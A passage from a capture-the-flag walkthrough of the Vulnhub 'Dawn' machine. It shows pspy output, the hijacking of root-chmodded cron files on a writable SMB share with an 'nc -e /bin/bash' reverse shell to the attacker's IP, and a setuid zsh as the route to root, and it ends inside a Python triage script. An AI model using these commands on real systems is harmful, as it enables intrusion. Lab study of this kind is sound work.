2022/12/03 21:24:44 CMD: UID=0    PID=791    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:24:44 CMD: UID=0    PID=792    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:24:44 CMD: UID=0    PID=793    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:24:44 CMD: UID=0    PID=794    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:24:44 CMD: UID=0    PID=795    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:24:44 CMD: UID=0    PID=796    | /sbin/init 
2022/12/03 21:24:44 CMD: UID=0    PID=797    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:24:44 CMD: UID=0    PID=798    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:24:44 CMD: UID=0    PID=799    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:25:01 CMD: UID=0    PID=804    | /usr/sbin/CRON -f 
2022/12/03 21:25:01 CMD: UID=0    PID=803    | /usr/sbin/cron -f 
2022/12/03 21:25:01 CMD: UID=0    PID=802    | /usr/sbin/cron -f 
2022/12/03 21:25:01 CMD: UID=0    PID=801    | /usr/sbin/cron -f 
2022/12/03 21:25:01 CMD: UID=0    PID=800    | /usr/sbin/cron -f 
2022/12/03 21:25:01 CMD: UID=0    PID=806    | /usr/sbin/CRON -f 
2022/12/03 21:25:01 CMD: UID=0    PID=805    | /usr/sbin/CRON -f 
2022/12/03 21:25:01 CMD: UID=0    PID=807    | /usr/sbin/CRON -f 
2022/12/03 21:25:01 CMD: UID=0    PID=808    | /usr/sbin/CRON -f 
2022/12/03 21:25:01 CMD: UID=1000 PID=813    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:25:01 CMD: UID=0    PID=812    | /usr/sbin/CRON -f 
2022/12/03 21:25:01 CMD: UID=0    PID=811    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:25:01 CMD: UID=???  PID=810    | ???
2022/12/03 21:25:01 CMD: UID=???  PID=809    | ???
2022/12/03 21:25:01 CMD: UID=33   PID=814    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:25:26 CMD: UID=0    PID=815    | /usr/sbin/anacron -d -q -s 
2022/12/03 21:25:26 CMD: UID=0    PID=816    | /bin/sh -c run-parts --report /etc/cron.weekly 
2022/12/03 21:25:26 CMD: UID=0    PID=817    | run-parts --report /etc/cron.weekly 
2022/12/03 21:25:26 CMD: UID=0    PID=818    | /bin/sh /etc/cron.weekly/0anacron 
2022/12/03 21:25:26 CMD: UID=0    PID=819    | anacron -u cron.weekly 
2022/12/03 21:25:26 CMD: UID=0    PID=820    | run-parts --report /etc/cron.weekly 
2022/12/03 21:25:50 CMD: UID=0    PID=821    | 
2022/12/03 21:26:01 CMD: UID=0    PID=826    | /usr/sbin/CRON -f 
2022/12/03 21:26:01 CMD: UID=0    PID=825    | /usr/sbin/cron -f 
2022/12/03 21:26:01 CMD: UID=0    PID=824    | /usr/sbin/cron -f 
2022/12/03 21:26:01 CMD: UID=0    PID=823    | /usr/sbin/cron -f 
2022/12/03 21:26:01 CMD: UID=0    PID=822    | /usr/sbin/cron -f 
2022/12/03 21:26:01 CMD: UID=0    PID=827    | /usr/sbin/CRON -f 
2022/12/03 21:26:01 CMD: UID=0    PID=829    | /usr/sbin/CRON -f 
2022/12/03 21:26:01 CMD: UID=0    PID=828    | /usr/sbin/CRON -f 
2022/12/03 21:26:01 CMD: UID=0    PID=832    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:26:01 CMD: UID=0    PID=831    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:26:01 CMD: UID=0    PID=830    | /usr/sbin/CRON -f 
2022/12/03 21:26:01 CMD: UID=0    PID=835    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:26:01 CMD: UID=???  PID=834    | ???
2022/12/03 21:26:01 CMD: UID=33   PID=833    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:26:01 CMD: UID=33   PID=836    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:26:58 CMD: UID=0    PID=838    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:26:58 CMD: UID=0    PID=837    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:27:01 CMD: UID=0    PID=844    | /usr/sbin/CRON -f 
2022/12/03 21:27:01 CMD: UID=0    PID=843    | /usr/sbin/cron -f 
2022/12/03 21:27:01 CMD: UID=0    PID=842    | /usr/sbin/cron -f 
2022/12/03 21:27:01 CMD: UID=0    PID=841    | /usr/sbin/cron -f 
2022/12/03 21:27:01 CMD: UID=0    PID=840    | /usr/sbin/cron -f 
2022/12/03 21:27:01 CMD: UID=0    PID=847    | /usr/sbin/CRON -f 
2022/12/03 21:27:01 CMD: UID=0    PID=846    | /usr/sbin/CRON -f 
2022/12/03 21:27:01 CMD: UID=0    PID=845    | /usr/sbin/CRON -f 
2022/12/03 21:27:01 CMD: UID=0    PID=850    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:27:01 CMD: UID=0    PID=849    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:27:01 CMD: UID=0    PID=848    | /usr/sbin/CRON -f 
2022/12/03 21:27:01 CMD: UID=0    PID=852    | /usr/sbin/CRON -f 
2022/12/03 21:27:01 CMD: UID=0    PID=851    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:27:01 CMD: UID=1000 PID=853    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:27:01 CMD: UID=33   PID=854    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:27:09 CMD: UID=0    PID=855    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:27:09 CMD: UID=0    PID=857    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:27:09 CMD: UID=0    PID=858    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:27:09 CMD: UID=0    PID=859    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:27:09 CMD: UID=0    PID=860    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:27:09 CMD: UID=0    PID=861    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:27:09 CMD: UID=0    PID=862    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:27:09 CMD: UID=0    PID=863    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:27:09 CMD: UID=0    PID=864    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:28:01 CMD: UID=0    PID=870    | /usr/sbin/CRON -f 
2022/12/03 21:28:01 CMD: UID=0    PID=869    | /usr/sbin/cron -f 
2022/12/03 21:28:01 CMD: UID=0    PID=868    | /usr/sbin/cron -f 
2022/12/03 21:28:01 CMD: UID=0    PID=867    | /usr/sbin/cron -f 
2022/12/03 21:28:01 CMD: UID=0    PID=866    | /usr/sbin/cron -f 
2022/12/03 21:28:01 CMD: UID=0    PID=874    | /usr/sbin/CRON -f 
2022/12/03 21:28:01 CMD: UID=0    PID=873    | /usr/sbin/CRON -f 
2022/12/03 21:28:01 CMD: UID=0    PID=872    | /usr/sbin/CRON -f 
2022/12/03 21:28:01 CMD: UID=0    PID=871    | /usr/sbin/CRON -f 
2022/12/03 21:28:01 CMD: UID=0    PID=877    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:28:01 CMD: UID=0    PID=876    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:28:01 CMD: UID=0    PID=875    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:28:01 CMD: UID=0    PID=879    | /usr/sbin/CRON -f 
2022/12/03 21:28:01 CMD: UID=1000 PID=878    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:28:01 CMD: UID=33   PID=880    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:29:01 CMD: UID=0    PID=885    | /usr/sbin/CRON -f 
2022/12/03 21:29:01 CMD: UID=0    PID=884    | /usr/sbin/cron -f 
2022/12/03 21:29:01 CMD: UID=0    PID=883    | /usr/sbin/cron -f 
2022/12/03 21:29:01 CMD: UID=0    PID=882    | /usr/sbin/cron -f 
2022/12/03 21:29:01 CMD: UID=0    PID=881    | /usr/sbin/cron -f 
2022/12/03 21:29:01 CMD: UID=0    PID=888    | /usr/sbin/CRON -f 
2022/12/03 21:29:01 CMD: UID=0    PID=887    | /usr/sbin/CRON -f 
2022/12/03 21:29:01 CMD: UID=0    PID=886    | /usr/sbin/CRON -f 
2022/12/03 21:29:01 CMD: UID=0    PID=891    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:29:01 CMD: UID=0    PID=890    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:29:01 CMD: UID=0    PID=889    | /usr/sbin/CRON -f 
2022/12/03 21:29:01 CMD: UID=0    PID=892    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:29:01 CMD: UID=1000 PID=894    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:29:01 CMD: UID=0    PID=893    | /usr/sbin/CRON -f 
2022/12/03 21:29:01 CMD: UID=33   PID=895    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:29:09 CMD: UID=0    PID=896    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                            
2022/12/03 21:29:09 CMD: UID=0    PID=897    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:29:09 CMD: UID=0    PID=898    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:29:09 CMD: UID=0    PID=899    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:29:09 CMD: UID=0    PID=900    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:29:10 CMD: UID=0    PID=901    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:29:10 CMD: UID=0    PID=902    | /sbin/init 
2022/12/03 21:29:10 CMD: UID=0    PID=903    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:29:10 CMD: UID=0    PID=904    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:29:10 CMD: UID=0    PID=905    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:29:52 CMD: UID=0    PID=906    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:29:53 CMD: UID=0    PID=907    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:30:01 CMD: UID=0    PID=913    | /usr/sbin/CRON -f 
2022/12/03 21:30:01 CMD: UID=0    PID=912    | /usr/sbin/cron -f 
2022/12/03 21:30:01 CMD: UID=0    PID=911    | /usr/sbin/cron -f 
2022/12/03 21:30:01 CMD: UID=0    PID=910    | /usr/sbin/cron -f 
2022/12/03 21:30:01 CMD: UID=0    PID=909    | /usr/sbin/cron -f 
2022/12/03 21:30:01 CMD: UID=0    PID=908    | /usr/sbin/cron -f 
2022/12/03 21:30:01 CMD: UID=0    PID=922    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:30:01 CMD: UID=1000 PID=921    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:30:01 CMD: UID=0    PID=920    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:30:01 CMD: UID=33   PID=919    | /usr/sbin/CRON -f awn/ITDEPT/web-control 
2022/12/03 21:30:01 CMD: UID=0    PID=917    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:30:01 CMD: UID=???  PID=916    | ???
2022/12/03 21:30:01 CMD: UID=???  PID=915    | ???
2022/12/03 21:30:01 CMD: UID=0    PID=924    | /usr/sbin/CRON -f 
2022/12/03 21:30:01 CMD: UID=33   PID=923    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:30:14 CMD: UID=0    PID=925    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:30:26 CMD: UID=0    PID=926    | /usr/sbin/anacron -d -q -s 
2022/12/03 21:30:26 CMD: UID=0    PID=927    | /sbin/init 
2022/12/03 21:30:26 CMD: UID=0    PID=928    | /bin/sh -c run-parts --report /etc/cron.monthly 
2022/12/03 21:30:26 CMD: UID=0    PID=929    | run-parts --report /etc/cron.monthly 
2022/12/03 21:30:26 CMD: UID=0    PID=930    | /bin/sh /etc/cron.monthly/0anacron 
2022/12/03 21:30:26 CMD: UID=0    PID=931    | anacron -u cron.monthly 
2022/12/03 21:30:27 CMD: UID=0    PID=932    | /usr/sbin/nmbd --foreground --no-process-group 
2022/12/03 21:30:28 CMD: UID=0    PID=933    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:31:01 CMD: UID=0    PID=938    | /usr/sbin/CRON -f 
2022/12/03 21:31:01 CMD: UID=0    PID=937    | /usr/sbin/cron -f 
2022/12/03 21:31:01 CMD: UID=0    PID=936    | /usr/sbin/cron -f 
2022/12/03 21:31:01 CMD: UID=0    PID=935    | /usr/sbin/cron -f 
2022/12/03 21:31:01 CMD: UID=0    PID=934    | /usr/sbin/cron -f 
2022/12/03 21:31:01 CMD: UID=0    PID=940    | /usr/sbin/CRON -f 
2022/12/03 21:31:01 CMD: UID=0    PID=939    | /usr/sbin/CRON -f 
2022/12/03 21:31:01 CMD: UID=0    PID=942    | /usr/sbin/CRON -f 
2022/12/03 21:31:01 CMD: UID=0    PID=941    | /usr/sbin/CRON -f 
2022/12/03 21:31:01 CMD: UID=0    PID=944    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:31:01 CMD: UID=0    PID=943    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:31:01 CMD: UID=1000 PID=947    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:31:01 CMD: UID=0    PID=946    | /usr/sbin/CRON -f 
2022/12/03 21:31:01 CMD: UID=0    PID=945    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:31:01 CMD: UID=33   PID=948    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:31:03 CMD: UID=0    PID=949    | 
2022/12/03 21:31:32 CMD: UID=0    PID=950    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:01 CMD: UID=0    PID=955    | /usr/sbin/cron -f 
2022/12/03 21:32:01 CMD: UID=0    PID=954    | /usr/sbin/cron -f 
2022/12/03 21:32:01 CMD: UID=0    PID=953    | /usr/sbin/cron -f 
2022/12/03 21:32:01 CMD: UID=0    PID=952    | /usr/sbin/cron -f 
2022/12/03 21:32:01 CMD: UID=0    PID=951    | /usr/sbin/cron -f 
2022/12/03 21:32:01 CMD: UID=0    PID=958    | /usr/sbin/CRON -f 
2022/12/03 21:32:01 CMD: UID=0    PID=957    | /usr/sbin/CRON -f 
2022/12/03 21:32:01 CMD: UID=0    PID=956    | /usr/sbin/CRON -f 
2022/12/03 21:32:01 CMD: UID=0    PID=960    | /usr/sbin/CRON -f 
2022/12/03 21:32:01 CMD: UID=0    PID=959    | /usr/sbin/CRON -f 
2022/12/03 21:32:01 CMD: UID=0    PID=963    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:32:01 CMD: UID=0    PID=962    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:32:01 CMD: UID=0    PID=961    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:32:01 CMD: UID=33   PID=965    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:32:01 CMD: UID=1000 PID=964    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:32:29 CMD: UID=33   PID=966    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:30 CMD: UID=0    PID=968    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:30 CMD: UID=0    PID=967    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:31 CMD: UID=0    PID=972    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:31 CMD: UID=0    PID=971    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:31 CMD: UID=0    PID=970    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:31 CMD: UID=0    PID=969    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:32 CMD: UID=0    PID=980    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:32 CMD: UID=0    PID=979    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:32 CMD: UID=0    PID=978    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:32 CMD: UID=0    PID=977    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:32 CMD: UID=0    PID=976    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:32 CMD: UID=0    PID=975    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:32 CMD: UID=0    PID=974    | /usr/sbin/apache2 -k start 
2022/12/03 21:32:32 CMD: UID=0    PID=973    | /usr/sbin/apache2 -k start 

Two of those jobs stand out:

 /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
 /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control

Every minute root runs chmod 777 on these two paths, and in the same minute cron executes product-control as UID 1000 (dawn) and web-control as UID 33 (www-data). Neither file actually exists in the ITDEPT directory yet, and that directory is the ITDEPT SMB share we can write to. So we can write a reverse shell into two files with those names and upload them with smbclient: root will make them executable, and cron will run them for us.
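The correlation done by eye above (root chmods a path, a different UID then runs it, every minute) is easy to automate over the raw pspy output. The following script is an added example for this write-up, not code from the original post or from pspy: it parses pspy's CMD lines, pairs each root "chmod 777 <path>" with later executions of that path, and reports the UID and period for every path that sits in a directory we can write to. The sample lines are copied from the pspy output on the page; the writable directory (the ITDEPT share) is passed in by the caller and is an assumption taken from the share name seen on the page.

```python
"""Triage pspy output for cron jobs that can be hijacked through a writable file.

Added example for this write-up; not part of the original post and not part
of pspy. The SAMPLE below is a constructed subset of the page's pspy output.
"""
import re
from collections import defaultdict
from datetime import datetime

PSPY_LINE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: UID=(?P<uid>\S+)\s+"
    r"PID=(?P<pid>\S+)\s+\|\s*(?P<cmd>.*)$"
)
CHMOD_777 = re.compile(r"\bchmod\s+777\s+(?P<path>/\S+)")
RUN_PATH = re.compile(r"^/bin/sh -c (?P<path>/\S+)$")

# Constructed sample: a subset of the pspy lines shown on the page.
SAMPLE = """\
2022/12/03 21:28:01 CMD: UID=0    PID=872    | /usr/sbin/CRON -f
2022/12/03 21:28:01 CMD: UID=0    PID=877    | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:28:01 CMD: UID=0    PID=876    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:28:01 CMD: UID=0    PID=875    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:28:01 CMD: UID=1000 PID=878    | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:28:01 CMD: UID=33   PID=880    | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:29:01 CMD: UID=0    PID=891    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:29:01 CMD: UID=0    PID=890    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:29:01 CMD: UID=0    PID=892    | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:29:01 CMD: UID=1000 PID=894    | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:29:01 CMD: UID=33   PID=895    | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:30:01 CMD: UID=???  PID=916    | ???
2022/12/03 21:30:01 CMD: UID=0    PID=922    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:30:01 CMD: UID=1000 PID=921    | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:30:01 CMD: UID=0    PID=920    | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:30:01 CMD: UID=33   PID=923    | /bin/sh -c /home/dawn/ITDEPT/web-control
"""


def parse(log):
    """Yield (timestamp, uid, pid, cmd) per well-formed line. pspy prints
    UID=??? when the process was gone before it could read /proc; skip those."""
    for line in log.splitlines():
        m = PSPY_LINE.match(line.rstrip())
        if not m or m["uid"] == "???":
            continue
        ts = datetime.strptime(m["ts"], "%Y/%m/%d %H:%M:%S")
        yield ts, int(m["uid"]), int(m["pid"]), m["cmd"].strip()


def analyze(log, writable_dirs):
    """Correlate root 'chmod 777 <path>' events with executions of <path>."""
    chmod_by_root = set()
    exec_uids = defaultdict(set)
    exec_times = defaultdict(set)
    for ts, uid, _pid, cmd in parse(log):
        m = CHMOD_777.search(cmd)
        if m and uid == 0:
            chmod_by_root.add(m["path"])
            continue
        m = RUN_PATH.match(cmd)
        if m:
            exec_uids[m["path"]].add(uid)
            exec_times[m["path"]].add(ts)

    def writable(path):
        return any(path.startswith(d.rstrip("/") + "/") for d in writable_dirs)

    report = {}
    for path, uids in exec_uids.items():
        times = sorted(exec_times[path])
        period = int((times[1] - times[0]).total_seconds()) if len(times) > 1 else None
        report[path] = {
            "exec_uids": uids,                      # who the file runs as
            "chmod_777_by_root": path in chmod_by_root,  # exec bit supplied by root
            "in_writable_dir": writable(path),      # can we create the file at all
            "runs": len(times),
            "period_s": period,
        }
    return report


def hijack_candidates(report):
    """Paths root makes world-writable/executable and cron then runs, in a
    directory the attacker can write to: dropping a script there gives code
    execution as the UID(s) listed in exec_uids."""
    return sorted(p for p, r in report.items()
                  if r["chmod_777_by_root"] and r["in_writable_dir"])


if __name__ == "__main__":
    rep = analyze(SAMPLE, writable_dirs=("/home/dawn/ITDEPT",))
    for path in hijack_candidates(rep):
        r = rep[path]
        print(f"{path}: runs as UID {sorted(r['exec_uids'])} every {r['period_s']}s "
              f"({r['runs']} runs seen)")
```

Run against the sample it reports product-control (UID 1000, every 60 s) and web-control (UID 33, every 60 s); /home/ganimedes/phobos is executed as root but never chmod'ed and lives outside the share, so it is not listed.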

┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ echo 'nc -e /bin/bash 192.168.56.206 5555&' > product-control
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ echo 'nc -e /bin/bash 192.168.56.206 5555&' > web-control    
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ smbclient //192.168.56.251/ITDEPT
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> put product-control 
putting file product-control as \product-control (0.4 kb/s) (average 0.4 kb/s)
smb: \> put web-control 
putting file web-control as \web-control (12.0 kb/s) (average 0.9 kb/s)
smb: \> ls
  .                                   D        0  Sat Dec  3 22:05:51 2022
  ..                                  D        0  Fri Aug  2 23:21:39 2019
  test.txt                            A        0  Sat Dec  3 21:30:48 2022
  web-control                         A       37  Sat Dec  3 22:05:51 2022
  product-control                     A       37  Sat Dec  3 22:05:48 2022

                7158264 blocks of size 1024. 2641220 blocks available
smb: \> 

┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.251] 57982
id
uid=1000(dawn) gid=1000(dawn) groups=1000(dawn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
dawn@dawn:~$ pwd
pwd
/home/dawn
dawn@dawn:~$ ls -alh
ls -alh
total 44K
drwxr-xr-x 5 dawn dawn 4.0K Aug  2  2019 .
drwxr-xr-x 4 root root 4.0K Aug  2  2019 ..
-rw------- 1 dawn dawn 1.3K Aug  2  2019 .bash_history
-rw-r--r-- 1 dawn dawn  220 Jul 31  2019 .bash_logout
-rw-r--r-- 1 dawn dawn 3.5K Jul 31  2019 .bashrc
drwx------ 3 dawn dawn 4.0K Aug  1  2019 .gnupg
drwsrwsrwx 2 dawn dawn 4.0K Dec  3 22:05 ITDEPT
drwxr-xr-x 3 dawn dawn 4.0K Aug  1  2019 .local
-rw------- 1 dawn dawn   13 Aug  1  2019 .mysql_history
-rw-r--r-- 1 dawn dawn  807 Jul 31  2019 .profile
-rw-r--r-- 1 dawn dawn   66 Aug  1  2019 .selected_editor
dawn@dawn:~$ 

The reverse shell comes back to Kali as dawn (UID 1000), i.e. from the product-control job. web-control fires at the same moment against the same port, but a single nc listener accepts only one connection, so the www-data shell is lost; to catch both, point web-control at a different port and run a second listener.

Privilege escalation

Upload linpeas.sh to /tmp on the target, make it executable and run it. Among its output, the following section stands out:

                                         ╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════                       
                                         ╚═══════════════════╝                                                                
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                   
-rwsr-xr-x 1 root root 35K Jun 17  2018 /usr/sbin/mount.cifs                                                                  
-rwsr-xr-- 1 root messagebus 50K Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 19K Jan 15  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Apr  8  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 63K Jan 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 23K Jan 15  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 63K Jul 27  2018 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                                                      
-rwsr-xr-x 1 root root 154K Jan 12  2019 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 51K Jan 10  2019 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 842K Feb  4  2019 /usr/bin/zsh
-rwsr-xr-x 1 root root 83K Jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Jan 10  2019 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 53K Jul 27  2018 /usr/bin/chfn  --->  SuSE_9.3/10

Of these, /usr/bin/zsh is the one that does not belong: no stock Debian package installs zsh setuid root, and unlike bash (which drops an elevated effective UID unless started with -p) zsh keeps it. Simply running the binary therefore gives a shell with euid 0, which the dawn# prompt below confirms.
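Spotting zsh in that list comes down to two checks a practitioner applies to every SUID listing: is the file setuid root and actually executable by us, and is it something the base system ships setuid or an addition. The script below is an added example for this write-up, not code from the original post or from linpeas. It decodes the symbolic mode into octal, keeps only setuid-root files with the "other" execute bit set (the dbus helper is -rwsr-xr--, so it is unreachable for a user outside the messagebus group), and diffs the rest against a baseline of binaries that are setuid root on a stock Debian 10 install. That baseline is this example's assumption, not something the page states; the sample lines are copied from the linpeas output above.

```python
"""Triage a SUID listing (ls -l / linpeas format) for privilege-escalation candidates.

Added example for this write-up; not code from the original post or from
linpeas. SAMPLE is a constructed copy of the page's linpeas SUID lines.
"""
import re

# Assumed baseline (basenames): setuid-root binaries a stock Debian 10 install
# ships (shadow, util-linux, sudo, openssh-client, dbus, policykit, eject, cifs-utils).
STOCK_SUID_ROOT = {
    "su", "sudo", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount", "umount",
    "pkexec", "polkit-agent-helper-1", "ssh-keysign", "dbus-daemon-launch-helper",
    "dmcrypt-get-device", "mount.cifs",
}
# Shells that keep an elevated effective UID when run setuid (bash drops it unless -p).
EUID_KEEPING_SHELLS = {"zsh"}

LISTING_LINE = re.compile(
    r"^(?P<mode>[-ldrwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\S+\s+"
    r"\S+\s+\d+\s+\S+\s+(?P<path>/\S+)"
)
SPECIAL_BIT = {2: 0o4000, 5: 0o2000, 8: 0o1000}  # exec column -> setuid/setgid/sticky

SAMPLE = """\
-rwsr-xr-x 1 root root 35K Jun 17  2018 /usr/sbin/mount.cifs
-rwsr-xr-- 1 root messagebus 50K Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 19K Jan 15  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Apr  8  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 63K Jan 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 23K Jan 15  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
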